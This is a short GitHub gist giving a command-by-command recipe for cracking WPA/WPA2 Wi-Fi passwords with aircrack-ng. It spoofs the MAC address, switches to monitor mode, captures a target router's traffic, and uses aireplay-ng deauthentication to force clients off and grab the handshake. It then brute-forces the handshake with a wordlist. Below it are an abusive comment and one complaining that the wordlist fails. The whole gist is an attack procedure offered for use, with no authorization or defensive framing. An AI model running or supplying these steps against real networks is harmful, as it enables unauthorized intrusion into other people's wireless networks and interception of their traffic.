Skip to content

Instantly share code, notes, and snippets.

@mouseroot
Created December 21, 2012 17:41
Show Gist options
  • Select an option

  • Save mouseroot/4354355 to your computer and use it in GitHub Desktop.

Select an option

Save mouseroot/4354355 to your computer and use it in GitHub Desktop.
Cracking WPA/WPA2
apt-get install aircrack-ng
apt-get install macchanger
ifconfig <interface> down
macchanger -s 00:00:13:37:00:00 <interface>
airmon-ng start <interface>
ifconfig <interface> up
airodump-ng <interface>
...let it populate
^c
airodump-ng -c <channel> -w <file to write to> --bssid <router MAC>
...spawn another console/tab
aireplay-ng -0 <number of times(1)> -e <Router name> <interface>
...wait for the handshake
...once you get a handshake stop airodump-ng(we no longer need it)
aircrack-ng -w <path to wordlist> <file with dumped data>
...sit back and watch it do its thing!
@attaurrahman1
Copy link
Copy Markdown

fuck u

@attaurrahman1
Copy link
Copy Markdown

wordlist not working

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment